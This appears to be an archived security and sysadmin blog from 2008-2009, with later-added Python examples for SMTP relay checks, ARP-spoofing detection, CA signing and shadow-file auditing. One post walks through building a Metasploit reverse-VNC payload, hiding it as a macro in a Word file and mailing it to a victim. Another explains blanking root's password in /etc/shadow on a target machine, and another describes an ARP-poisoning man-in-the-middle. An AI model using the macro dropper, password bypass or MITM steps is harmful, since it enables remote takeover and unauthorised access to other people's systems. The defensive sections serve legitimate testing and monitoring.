Saturday, August 1, 2009

How can I test my SMTP service ?

You can use TELNET to test your SMTP service. SMTP uses port number 25, so to open an SMTP session with an Exchange server from telnet we use the command

telnet test.server 25

If the connection is successful, we should see a banner and a command line interface. You may consult RFC 821 for the SMTP commands.

220 test.server Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Mon, 15 Sep 2009 20:50:07 +0210
helo test.server
250 test.server Hello []
mail from:
250 2.1.0 OK
rcpt to:
250 2.1.5
354 Start mail input; end with .
subject: test mail
Hi Sam,
I'm sending email using TELNET.
250 2.6.0 Queued mail for delivery
221 2.0.0 test.server Service closing transmission channel
Connection to host lost.
Press any key to continue...

The same session can also be used to test how the server handles a NULL sender and to check whether it acts as an SMTP open relay.
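The hand-typed dialogue above can be scripted. The following is an added example, not code from the original post: it drives HELO, MAIL FROM and RCPT TO exactly as in the telnet session and then QUITs before DATA, so it can test your own server for open relaying (a foreign recipient answered with 250) or for NULL-sender handling (mail_from="" is sent as MAIL FROM:<>) without ever producing a message. The ScriptedPeer class and the canned server replies are constructed stand-ins for a live connection; relay_check_tcp runs the same check against a real host.

```python
import socket

def read_reply(rfile):
    """Read one SMTP reply; a '-' as fourth character ("250-...") means more lines follow."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:                       # peer closed the connection
            return 0, lines
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            break
    return (int(line[:3]) if line[:3].isdigit() else 0), lines

def smtp_command(rfile, wfile, cmd):
    """Send one command line and return (reply code, reply lines)."""
    wfile.write((cmd + "\r\n").encode("ascii"))
    wfile.flush()
    return read_reply(rfile)

def relay_check(rfile, wfile, helo_name, mail_from, rcpt_to):
    """Walk HELO/MAIL/RCPT then QUIT, never sending DATA, so no message is produced.
    Returns (accepted, transcript); accepted means the server answered RCPT TO with 250."""
    transcript = []
    code, lines = read_reply(rfile)       # 220 banner
    transcript += lines
    if code != 220:
        return False, transcript
    accepted = False
    for cmd in (f"HELO {helo_name}", f"MAIL FROM:<{mail_from}>", f"RCPT TO:<{rcpt_to}>"):
        code, lines = smtp_command(rfile, wfile, cmd)
        transcript += [cmd] + lines
        if code != 250:
            break
    else:
        accepted = True
    code, lines = smtp_command(rfile, wfile, "QUIT")
    transcript += ["QUIT"] + lines
    return accepted, transcript

def relay_check_tcp(host, port=25, **kw):
    """Same check against a live server, e.g. relay_check_tcp("test.server", ...)."""
    with socket.create_connection((host, port), timeout=15) as s, \
            s.makefile("rb") as r, s.makefile("wb") as w:
        return relay_check(r, w, **kw)

class ScriptedPeer:
    """Constructed stand-in for the socket files: serves canned replies, records commands."""
    def __init__(self, replies):
        self.replies, self.sent = list(replies), []
    def readline(self):
        return self.replies.pop(0) if self.replies else b""
    def write(self, data):
        self.sent.append(data.decode("ascii"))
    def flush(self):
        pass

# Constructed server scripts: one relays for anybody, the other refuses the foreign recipient.
GREETING = [b"220 test.server ESMTP ready\r\n", b"250 test.server Hello []\r\n", b"250 2.1.0 OK\r\n"]
OPEN_RELAY = GREETING + [b"250 2.1.5 OK\r\n", b"221 2.0.0 Bye\r\n"]
CLOSED_RELAY = GREETING + [b"550 5.7.1 Unable to relay\r\n", b"221 2.0.0 Bye\r\n"]
```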

Sunday, May 24, 2009

Metasploit & Reverse VNC Injection hidden in a Word file - PoC (Proof of Concept)

Hello friends, today I'm going to show how to use the Metasploit v3.2 payload feature for Reverse VNC Injection. The steps are given below.

Let's begin.

1) Create a payload for Reverse VNC Injection with Metasploit's msfpayload utility:
./msfpayload windows/vncinject/reverse_tcp LHOST= V > exploit.bas

2) Copy the exploit.bas file to another Windows system to make the .doc file.
Create a new doc file and write some text into it, then do the following:
go to Tools -> Macro -> Visual Basic Editor,
then go to File -> Import File, choose exploit.bas and save the document with a name, e.g. NiceGame.doc.
Now the file is ready; send this file to the victim via mail or by some other way.

3) Now in BackTrack 4, type this command:
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=True E

On the target Windows system, when the victim opens the file, he/she is asked whether to run the macro; if it is accepted, the connection is initiated and the VNC client opens on the BackTrack machine.

Note: VNC does not need to be installed on the victim PC. This also works over a WAN; the only thing is that you must forward port 4444 on your modem or router.

Original Video links for the above guide,

Tuesday, November 18, 2008

Anonymous Internet Surfing or Hide your IP address | Open VPN | Open Proxy Server | IP range blocked by Rapidshare.Com

Hi friends, recently I found an Open VPN (Virtual Private Network) server named "". You can create a 30-day trial account. This type of server can be used for different purposes (already mentioned). To access the VPN service you have to follow these steps...
~:For XP users :~
(These instructions are applicable to Microsoft Windows XP.)

1. Click on "Start button" >> "Connect To" >> "Show all connections" .
2. Choose "Create a new connection".
3. Click on "Create a connection to the network at your workplace".
4. Select Virtual Private Network connection (VPN). Click Next.
5. Enter company name "Relakks". Click Next.
6. Enter "" as "Host name or IP address". Click Next.
7. Select "My use only" if you want this connection to apply only to your user on the computer. Select "Anyone's use" if you want this connection to apply to all users. Click Next.
8. Check "Add a shortcut to this connection to my desktop" if you want easy access to your Relakks-service.
9. Click Finish.
10. You should now disable "File and Printer Sharing" as it can pose a security issue.
11. Right click on the newly created Relakks connection and choose "Properties".
12. Click on the "Network" tab and uncheck the "File and Printer Sharing for Microsoft Networks".
13. Click OK.
14. To use Relakks (Safe Surf), double click the connection.

~:For Vista users:~
Connecting Windows Vista

Due to a problem with SP1 for Vista your VPN connection will no longer work. You need to uninstall SP1 and the VPN connection works fine again. Now let's see when Microsoft fixes this bug and releases a hotfix.

"1. Click Start>All Programs>Accessories and click "Command Prompt".
2. In the Command prompt, type the following commands one by one and
press Enter after each one.
Netcfg -u MS_L2TP
Netcfg -u MS_PPTP
Netcfg -l %windir%\inf\netrast.inf -c p -i MS_PPTP
Netcfg -l %windir%\inf\netrast.inf -c p -i MS_L2TP
NOTE: When prompted by User Account Control, click Continue. "
Follow these simple steps to install Säker Surf (Safe Surf) on your computer using the PPTP protocol.
(This instruction applies to the operating system Microsoft Windows Vista.)
1. Click Start menu and then Connect To.
2. Click on "Set up a connection or network".
3. Choose "Connect to a workplace" and then click Next.
4. Choose "Use my Internet connection (VPN)".
5. Type "" in the "Internet address" field.
6. Type "Relakks" in the "Destination name" field.
7. Check the alternative "Allow other people to use this connection" if you want your service to be available for any user using this computer. Click Next.
8. Fill in your username and password. NOTE! Leave the "Domain" field empty.
9. Click Connect to finish the installation and to test your connection.
10. You will now get a notification saying "You are connected". Click Close. You are now connected to the service.
11. You will see a dialogue box saying "Select a location for the 'Relakks' network". Choose "Public location" for highest security settings. Then click Close.
You are now connected to the Relakks Safe Surf service. A small status icon will appear in the lower right corner of your screen looking like two computers with a yellow warning triangle in front of them. If you want to stop using the service you just click the icon and then Relakks. Under Relakks (Public network) you click Disconnect to disconnect from the service.
To reconnect click on the Start menu and then Connect To. Choose Relakks and click connect.

~:For MAC users :~

Connecting OSX
Follow these simple steps to install Säker Surf (Safe Surf) on your computer using the PPTP protocol.
1. Open Internet Connect (in the application folder).
2. Click VPN.
3. From the Configuration pop-up menu, choose PPTP.
4. Type: in the field Server Address.
5. Type your RELAKKS Account Name in the field Account Name.
6. Type your RELAKKS Password in the field Password.
7. Click Configuration -> Edit Configurations
8. Save your configuration in the pop up as RELAKKS.
9. Click OK
10. Choose "Show VPN status in the menu bar" to monitor that your RELAKKS VPN is active.
11. Click Connect to activate your RELAKKS VPN Service.
12. End Internet Connect. Save your configuration in the pop up as RELAKKS.
OSX (for all Mac users with Leopard)
Mac OS X 10.5 Leopard has changed and the Internet Connect application is no longer in the system. To configure a VPN, the user has to go to the Network preference pane and create a connection with the button labelled '+' in the lower left corner, then select VPN and fill in the Relakks information. VPN setup in 10.5 (English):
1. Go to System Preferences, then Network.
2. Click on the plus symbol in the lower left corner to add a new connection. (Note: you may need to click the lock icon in the lower left to unlock the preference pane and make changes.)
3. Under "Interface" select "VPN".
4. Set the VPN Type to PPTP.
5. The Service Name should be Relakks.
6. Click "Create".
7. The window will now show a place for the server address, and account name.
8. The server is
9. Type your RELAKKS Account Name in the field Account Name.
10. Click on "Authentication Settings" and select "Password"
11. Enter your Relakks password and click "OK"
12. Click the checkbox for "Show VPN status in menu bar"
13. Click "Apply" in the lower right corner.
14. Click "Connect"

Saturday, June 14, 2008

What is ARP Poisoning ? How to get rid from ARP poisoning ?

What is ARP Poisoning ?

In an Ethernet network computers communicate with each other via Ethernet (MAC, Media Access Control) addresses. So a mechanism is needed for matching IP addresses with the addresses in an Ethernet network. The mechanism is called ARP (Address Resolution Protocol). What ARP does is exactly what most people do when they have to find Mister X in a crowd of people: they shout loud enough that everyone can hear them and expect Mister X to answer if he is there. When he answers, we will know who he is.
When ARP wants to know the Ethernet address matching a given IP address it uses an Ethernet technique called BROADCASTING, with which the datagram is addressed to all the workstations in the network. The broadcast datagram sent by ARP contains a request for the IP address. Every computer that receives that request compares the requested address with its own IP address and, if they match, sends an ARP reply back to the asking computer. After receiving the reply, the asking computer can get the Ethernet address of the computer it is looking for from that reply. After the computer finds an Ethernet address, it stores it in its ARP cache (ARP table), so it won't need to look for it the next time it wants to send a datagram to the same address. However, it is not good for this information to be stored forever (the Ethernet adapter of the other host may be replaced for some reason, and the entry for the computer's IP in the ARP cache will become invalid). So the entries in the ARP cache expire after a period of time.

What's the difference between switch and hub?

The switches (hubs) don't only provide more connection points to the network; they also retransmit the signal. However, the hub just retransmits the data received from one port to all the other ports, so there is no need to poison, as you get the datagram anyway. Normally the network adapter compares the destination Ethernet address of the packets with its own Ethernet address. If they match, the data is accepted. If they don't, it just drops the packets. You can put your network adapter in promiscuous mode (which is exactly what Ettercap does) and get all the packets. The switch does things in a more 'elegant' way. It has a simple CAM (Channel Access Method) table, which is a simple mapping of Ethernet addresses to ports. When a datagram comes through a port, the switch remembers the source Ethernet address of the datagram and stores it in the CAM table for the given port, so when a datagram arrives for this computer, it doesn't retransmit it to all ports but only to the one that is bound to the Ethernet address of the receiver in the CAM table. If there is no Port Security, the CAM table is dynamically updated (e.g. if you want to connect to another port, if you change your network adapter etc.). Thus we can change the CAM table and map another Ethernet address to our port. This technique is called Port Stealing and is discussed in another topic.

Now about the poisoning:

Most operating systems will replace an entry in their ARP cache even if they haven't sent an ARP request before. That allows a MITM (Man-In-The-Middle) attack to be performed. For example, let's say we have 2 computers, with Ethernet addresses AA:AA:AA:AA:AA:AA for computer A and BB:BB:BB:BB:BB:BB for computer B, and IP addresses for computer A and for computer B. Now we want to perform a MITM attack. We are computer C with Ethernet address CC:CC:CC:CC:CC:CC and IP address . So we send an ARP reply to computer A, saying that we have IP address . Computer A updates its ARP cache and, since we have Ethernet address CC:CC:CC:CC:CC:CC, the entry in its ARP cache for is bound to our Ethernet address. Now when computer A wants to send a datagram to computer B, it first checks the ARP cache to see if computer B's Ethernet address is already there. Since the packet is for (computer B's IP address), computer A finds that the Ethernet address for computer B is CC:CC:CC:CC:CC:CC (our Ethernet address) and sends the datagram to us. Computer A is poisoned. We do the same to computer B: it has an ARP entry for (computer A's IP address) bound to CC:CC:CC:CC:CC:CC (our Ethernet address), so when it sends datagrams to computer A, these datagrams come to us. For the communication between computer A and computer B to continue uninterrupted, we need to forward the packets to their original destination. So when we receive a packet for computer A we forward it to computer A, and when we receive a packet for computer B we forward it to computer B. In Linux, for this to work, you can use the simple kernel forwarding (echo 1 > /proc/sys/net/ipv4/ip_forward) or use a more complex one, which Ettercap and some other tools use, which even allows you to perform a MITM attack on an SSL connection.


Counter measures for ARP poisoning:

Some operating systems like Solaris do not accept ARP replies without first initiating an ARP request, so they are not vulnerable to this attack.
In this case, a spoofed ICMP packet (ping) is used. The goal is to get a valid entry in the victim's ARP cache, because when they receive an ARP reply from you they will first check their cache to see if you're already there and, if you're not, they simply won't add you at all. So you send each victim a ping with your own Ethernet address and the other victim's IP address as the source. In the case mentioned above, you ping computer A with source IP address and Ethernet address CC:CC:CC:CC:CC:CC and computer B with source IP address and Ethernet address CC:CC:CC:CC:CC:CC. Once you have got yourself into their ARP cache, you can poison normally.
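The detection side of what this article describes, as an added example that is not part of the original: a small parser for ARP-over-Ethernet frames and a monitor in the spirit of arpwatch that flags replies answering no outstanding request (the very replies Solaris refuses) and any IP whose MAC binding changes. The ICMP trick above only seeds the victim's cache; the poisoning reply that follows is still visible on the wire as an unsolicited reply plus a binding change. The addresses, frames and monitor are all constructed sample data.

```python
import struct
from dataclasses import dataclass

@dataclass
class Arp:
    op: int      # 1 = request, 2 = reply
    sha: str     # sender hardware (MAC) address
    spa: str     # sender protocol (IP) address
    tha: str     # target hardware address
    tpa: str     # target protocol address

def _mac(b): return ":".join(f"{x:02x}" for x in b)
def _ip(b): return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Decode an Ethernet II frame carrying ARP (EtherType 0x0806); None if it is not one."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):   # Ethernet / IPv4 only
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return Arp(op, _mac(sha), _ip(spa), _mac(tha), _ip(tpa))

def build_arp(op, sha, spa, tha, tpa):
    """Build a raw ARP-over-Ethernet frame; used here only to construct sample traffic."""
    mac = lambda s: bytes(int(x, 16) for x in s.split(":"))
    ip = lambda s: bytes(int(x) for x in s.split("."))
    dst = mac(tha) if op == 2 else b"\xff" * 6              # requests are broadcast
    return (dst + mac(sha) + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + mac(sha) + ip(spa) + mac(tha) + ip(tpa))

class ArpMonitor:
    """Flags the two things a poisoning attempt cannot avoid showing on the wire."""
    def __init__(self):
        self.bindings = {}    # IP -> MAC, as first learned
        self.pending = set()  # (asker IP, asked-for IP) of requests still unanswered
        self.alerts = []

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None:
            return None
        if a.op == 1:
            self.pending.add((a.spa, a.tpa))
        elif a.op == 2:
            # A reply from spa to tpa is solicited only if tpa previously asked for spa.
            if (a.tpa, a.spa) in self.pending:
                self.pending.discard((a.tpa, a.spa))
            else:
                self.alerts.append(f"unsolicited reply: {a.spa} is-at {a.sha} sent to {a.tpa}")
        known = self.bindings.setdefault(a.spa, a.sha)
        if known != a.sha:
            self.alerts.append(f"binding change: {a.spa} was {known}, now {a.sha}")
        return a

A, B, C = "aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", "cc:cc:cc:cc:cc:cc"
# Constructed traffic: A resolves B normally, then C tells A that B's IP is at C's MAC.
SAMPLE_FRAMES = [
    build_arp(1, A, "10.0.0.1", "00:00:00:00:00:00", "10.0.0.2"),
    build_arp(2, B, "10.0.0.2", A, "10.0.0.1"),
    build_arp(2, C, "10.0.0.2", A, "10.0.0.1"),
]
```

Feeding SAMPLE_FRAMES through an ArpMonitor yields no alert for the legitimate exchange and two alerts for the third frame.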

Tuesday, June 3, 2008


  1. After the installation of IIS, go to the Internet Information Services Manager. Select the website where the certificate is to be installed, then right-click on the default website and select the Directory Security tab.

  2. On the Directory Security tab, click Server Certificate.

  3. Click Next and select Create A New Certificate.

  4. Select Prepare The Request Now, But Send It Later and click Next.

  5. Type a name for the certificate and a bit length, and then click Next.

  6. Type your organizational name and organizational unit in the boxes provided and click Next.

  7. Enter your Web server name and click Next.

  8. In the next dialog box, provide some geographical information and click Next.

  9. Enter the location and the name for the certificate request, then click Next.

  10. Verify the information and click Next, and then click Finish. By default the request file is saved on the C: drive as a .txt file. Copy it and take it to the OpenSSL CA server.

  11. On the OpenSSL server, paste it into the CA server directory and rename it to newreq.pem (the OpenSSL command to sign a certificate request takes only this name, so it must be newreq.pem and must be in the current directory).

  12. Now, let's sign the certificate request:

$sh /usr/lib/ssl/misc/ -sign

(The script is automatically stored in that specified location at the time of CA installation.)

  13. After the signing process completes, the certificate is created as newcert.pem in the current directory.

  14. This certificate will not be accepted by a Windows 2003 server in this form. You have to rename it to a .cer file.

  15. Take the .cer file to the Windows machine and open the Internet Information Services Manager (IIS) again.

  16. Select the website where the certificate is to be installed, then right-click on the default website and select the Directory Security tab.

  17. On the Directory Security tab, click Server Certificate.

  18. Select Process the pending request and install the certificate.

  19. Browse to and select the new certificate, click Next and then Finish. The certificate is now installed; you can see it by clicking the View Certificate button.

Apache-ssl and CA


Under Debian, the following packages have to be installed via apt-get:

* apache-ssl
* openssl
* libapache-mod-ssl (will automatically be installed by apache-ssl)

The SSL certification process consists of three basic steps:

* If not done already, create a certificate authority (CA), which we will use to sign our own
* Create a new certificate request
* Sign the request with our CA to obtain a valid certificate.

Create a certificate authority

The OpenSSL package comes with a default openssl.cnf file under /usr/lib/ssl/openssl.cnf. We will edit the default values slightly, i.e. we change the default path from demoCA to ourCA. To do so, copy /usr/lib/ssl/openssl.cnf to /etc/ssl/openssl.cnf and change the line

dir = ./demoCA

to

dir = /etc/ssl/ourCA

For security reasons, you will have to create the necessary file and directory structure manually. In particular, you have to create the following folders and files:

* /etc/ssl/ourCA/
* /etc/ssl/ourCA/index.txt (empty file)
* /etc/ssl/ourCA/newcerts/
* /etc/ssl/ourCA/private/
* /etc/ssl/ourCA/serial (file containing "01" as the first and only line)

We can now tell openssl to create a new certification authority for us:

#openssl req -new -x509 -keyout /etc/ssl/ourCA/private/cakey.pem -out /etc/ssl/ourCA/cacert.pem -config /etc/ssl/openssl.cnf

You will be asked a few questions about the new CA. Just enter information that makes sense and is valid. Also, choose a good passphrase, since you'll have to remember it every time you want to validate and sign a new certificate request.

Issue a certificate request

We are now ready for the interesting part of this tutorial. To create a certificate request, execute

#openssl req -new -keyout newkey.pem -out newreq.pem -days 365

OpenSSL will again ask you a few questions. Make sure that you enter the hostname of your SSL server as "Common Name". This is very important and things will break if you don't do it.

If everything went fine, this will give you two new files in the directory where you ran this command. The first (newkey.pem) is our certificate private key and the second file (newreq.pem) is the certificate request for the CA.

There is one obstacle with the private key in its current form: it requires a passphrase to be used. That means, if you want Apache to use this SSL key, you'll have to supply the passphrase at Apache's startup. This is not very handy, for sure. We can however remove the passphrase by

#openssl rsa -in newkey.pem -out nopwkey.pem

You will be asked for the private key's passphrase. If things went right, you will have a new private key called nopwkey.pem, which is not passphrase protected anymore.

To let a CA sign a certificate request, they need both our private key and the certificate request. We can combine both into one file by cat'ing them together:

#cat newreq.pem nopwkey.pem > new.pem

Signing the certificate

The last step consists of the actual signing process. Just issue

#openssl ca -policy policy_anything -out newcert.pem -config /etc/ssl/openssl.cnf -infiles new.pem

in the same directory where your certificate request files are stored. You will first be asked for the CA passphrase (now you know why it is important to remember it!) and you can then either sign or reject the certificate.

You should now copy newcert.pem and nopwkey.pem to some convenient place, since Apache will only need those two files to operate in SSL mode.
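The three steps above (create the CA, issue a request, sign it), scripted end to end as an added example that is not from the original tutorial. It writes a minimal openssl.cnf of its own instead of editing /usr/lib/ssl/openssl.cnf, creates the ourCA layout with the same index.txt/serial/newcerts/private files, builds the CA, generates and passphrase-strips the server key, signs the request and checks the result with `openssl verify`. It shells out to the openssl binary; -subj, -passout/-passin and -batch stand in for the interactive prompts, and `openssl ca` is given newreq.pem alone, since the CA only needs the request and the private key stays on the server. Paths, passphrases and the hostname are constructed placeholders.

```python
import os, shutil, subprocess, tempfile

OPENSSL_CNF = """\
[ ca ]
default_ca = CA_default
[ CA_default ]
dir           = {dir}
database      = $dir/index.txt
new_certs_dir = $dir/newcerts
certificate   = $dir/cacert.pem
private_key   = $dir/private/cakey.pem
serial        = $dir/serial
default_md    = sha256
default_days  = 365
policy        = policy_anything
[ policy_anything ]
organizationName = optional
commonName       = supplied
[ req ]
distinguished_name = req_dn
[ req_dn ]
commonName = Common Name
"""

def openssl_available():
    return shutil.which("openssl") is not None

def run(*args):
    """Run one openssl subcommand and return its stdout; raises on a non-zero exit."""
    return subprocess.run(["openssl", *args], check=True, text=True, capture_output=True).stdout

def build_ca_and_sign(ca_dir, hostname, ca_pass="capass", key_pass="keypass"):
    """The tutorial's three steps, non-interactive; returns output paths and check results."""
    # Step 1: the layout openssl ca expects, created by hand as the text says.
    os.makedirs(os.path.join(ca_dir, "newcerts"))
    os.makedirs(os.path.join(ca_dir, "private"), mode=0o700)
    open(os.path.join(ca_dir, "index.txt"), "w").close()
    with open(os.path.join(ca_dir, "serial"), "w") as f:
        f.write("01\n")
    cnf = os.path.join(ca_dir, "openssl.cnf")
    with open(cnf, "w") as f:
        f.write(OPENSSL_CNF.format(dir=ca_dir))
    cacert = os.path.join(ca_dir, "cacert.pem")
    run("req", "-new", "-x509", "-days", "3650", "-config", cnf, "-subj", "/CN=Our CA",
        "-keyout", os.path.join(ca_dir, "private", "cakey.pem"), "-out", cacert,
        "-passout", f"pass:{ca_pass}")
    # Step 2: a request whose Common Name is the server hostname, then strip the passphrase.
    newkey, newreq = os.path.join(ca_dir, "newkey.pem"), os.path.join(ca_dir, "newreq.pem")
    run("req", "-new", "-config", cnf, "-subj", f"/CN={hostname}", "-keyout", newkey,
        "-out", newreq, "-passout", f"pass:{key_pass}")
    nopwkey = os.path.join(ca_dir, "nopwkey.pem")
    run("rsa", "-in", newkey, "-out", nopwkey, "-passin", f"pass:{key_pass}")
    os.chmod(nopwkey, 0o600)  # the unencrypted key must not be readable by anyone else
    # Step 3: sign with the CA; -batch replaces the interactive sign/reject prompt.
    newcert = os.path.join(ca_dir, "newcert.pem")
    run("ca", "-batch", "-config", cnf, "-policy", "policy_anything", "-out", newcert,
        "-passin", f"pass:{ca_pass}", "-infiles", newreq)
    return {"cert": newcert, "key": nopwkey,
            "verify": run("verify", "-CAfile", cacert, newcert).strip(),
            "subject": run("x509", "-in", newcert, "-noout", "-subject").strip()}

def demo(hostname="www.example.com"):
    with tempfile.TemporaryDirectory() as tmp:
        r = build_ca_and_sign(os.path.join(tmp, "ourCA"), hostname)
        return r["verify"].endswith(": OK") and hostname in r["subject"]
```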

Apache-SSL configuration

Under Debian, the SSL-enabled Apache version has its own configuration file, available under /etc/apache-ssl/httpd.conf. Edit it and change or add the following lines:

# This is our signed certificate
SSLCertificateFile /path/to/newcert.pem

# This is our unencrypted private key
SSLCertificateKeyFile /path/to/nopwkey.pem

Start Apache-SSL by executing

#/etc/init.d/apache-ssl start

Thursday, May 29, 2008

How to Break Linux password ... !

Dear friends!

Did you know that a default Linux installation is vulnerable?

The Linux root password can be broken easily by modifying the ‘/etc/shadow’ file.

In Linux/Unix the ‘shadow’ file is used to store the user name, password, account validity period etc.

The user password is stored in the 3rd column in encrypted form and each column is delimited by :, e.g.

Root:x:/qwYnM6ulk … :9999:7:1:::

You cannot change the shadow file from the running Linux.

You only need to boot up the target system with a live Linux CD (maybe Knoppix or BackTrack) and log into the system as the root user.

If you empty the 3rd field it implies that no password is set for the root account. After modifying, the field will look like this:


Save the file and reboot your system.

Try to log into the system as root; you will not need a password at all.

I tried it on different versions of Linux (Red Hat 9, Fedora 7, Mandrake 10.0) and it worked successfully. But on a hardened Linux system it may not work.

Note: You must take a backup copy of the ‘/etc/shadow’ file for emergency shadow file recovery.
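A defender-side check for the weakness this post relies on, added here and not part of the original post: it parses text in /etc/shadow format and reports accounts whose password field is empty (they log in with no password), legacy DES/MD5 hashes and malformed lines, so the audit can run from cron or after a machine has been out of your hands. The SAMPLE_SHADOW entries and every hash string in them are constructed placeholders, not real password hashes.

```python
import re

# Hash-id prefix ($id$...) -> crypt scheme; absent from this table means "look closer".
HASH_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "5": "sha256crypt",
            "6": "sha512crypt", "7": "scrypt", "y": "yescrypt", "gy": "gost-yescrypt"}

def classify_hash(field):
    """Describe the password field of one shadow entry."""
    if field == "":
        return "EMPTY"
    if field.startswith(("!", "*")):      # locked or no-login account
        return "locked"
    m = re.match(r"^\$([^$]+)\$", field)
    if m:
        return HASH_IDS.get(m.group(1), f"unknown(${m.group(1)}$)")
    if len(field) == 13:                   # traditional DES crypt: 2-char salt + 11
        return "descrypt"
    return "unrecognised"

def audit_shadow(text):
    """Return (line number, account, finding) for entries that deserve attention.
    Shadow fields: name:password:lastchange:min:max:warn:inactive:expire:reserved"""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            findings.append((lineno, "?", "malformed line"))
            continue
        name, kind = fields[0], classify_hash(fields[1])
        if kind == "EMPTY":
            findings.append((lineno, name, "EMPTY PASSWORD: account logs in without one"))
        elif kind in ("descrypt", "md5crypt"):
            findings.append((lineno, name, f"weak legacy hash ({kind})"))
        elif kind.startswith("unknown") or kind == "unrecognised":
            findings.append((lineno, name, f"unexpected password field ({kind})"))
    return findings

def audit_file(path="/etc/shadow"):
    """Audit a real shadow file (reading it needs root)."""
    with open(path) as fh:
        return audit_shadow(fh.read())

# Constructed sample; the hash strings are placeholders, not real password hashes.
SAMPLE_SHADOW = """\
root::19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
bob:$1$salt$PLACEHOLDER:19000:0:99999:7:::
carol:!$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
broken line without fields
"""
```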